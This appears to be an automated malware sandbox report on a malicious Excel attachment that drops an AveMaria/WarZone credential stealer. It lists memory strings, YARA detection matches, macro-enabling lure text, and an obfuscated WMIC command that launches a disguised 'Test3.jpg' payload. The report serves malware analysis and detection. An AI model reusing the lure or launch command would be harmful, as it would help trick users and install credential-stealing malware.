Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: Test3.jpg, 00000013.00000002.948026637.0000000004080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Test3.jpg, 00000013.00000002.948026637.0000000004080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://tasks.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Test3.jpg

Jump to behavior

Source: Test3.jpg, 00000012.00000002.782831741.000000000069A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPED	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPED	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 8	Screenshot OCR: Enable Editing" form the yellow bar and then click 15 8 "Enable Content" 16 g 17 10 18 11 19 12
Source: Screenshot number: 8	Screenshot OCR: Enable Content X 5 Al - " jG: " : A B C D E F G I H I I I J I K 'T 8 1 9 2 :: : Qil D?'ument
Source: Screenshot number: 12	Screenshot OCR: Enable Editing" form the yellow bar and then click 15 8 "Enable Content" 16 g 17 10 18 11 19 12
Source: Screenshot number: 12	Screenshot OCR: Enable Content X 5 , Al - " jR " :' A B C I D I E, I F I G I H I I I J I K 'T 8 1 I 'k 9 2 ::

Contains functionality to create processes via WMI

Show sources

Source: WMIC.exe, 00000011.00000002.766074537.0000000000860000.00000004.00000020.sdmp

Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpgWmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\DefaultGL

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Telex06012020.xls

Initial sample: EXEC

Powershell drops PE file

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Test1.txt

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Code function: 18_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,

18_2_00424D1A

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_0042A85C	18_2_0042A85C
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_0042A4FE	18_2_0042A4FE
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_0043E94B	18_2_0043E94B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_034F2760	21_2_034F2760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_034FCF19	21_2_034FCF19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_034FBEC8	21_2_034FBEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_034F0040	21_2_034F0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_034F003F	21_2_034F003F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_034F0040	21_2_034F0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_034F0CE0	21_2_034F0CE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_03520780	21_2_03520780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_0352EE08	21_2_0352EE08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_03526470	21_2_03526470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_0352BC28	21_2_0352BC28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_0352C4C0	21_2_0352C4C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_03521278	21_2_03521278
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_035287E8	21_2_035287E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_03526470	21_2_03526470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_03526470	21_2_03526470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_08170006	21_2_08170006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_08170040	21_2_08170040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_035287D8	21_2_035287D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_0352D588	21_2_0352D588

Source: Telex06012020.xls

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Program Files\Microsoft DN1\sqlmap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4

Source: Test3.jpg.15.dr

Static PE information: Resource name: WM_DSP type: PE32 executable (GUI) Intel 80386, for MS Windows

Source: mvqape5o.dll.10.dr

Static PE information: No import functions for PE file found

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: kdscli.dll

Jump to behavior

Source: Telex06012020.xls, type: SAMPLE	Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: Telex06012020.xls, type: SAMPLE	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000002.946480583.0000000003465000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000003.759722473.00000000061E3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000000.780781628.0000000000443000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000003.785553106.000000000062C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000003.739726186.000000000071D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000002.946136847.0000000002B8F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000000.764732381.0000000000443000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000002.939727802.000000000054F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000003.785647201.000000000062C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000001.781400247.000000000054F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000002.783515823.0000000002C2F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
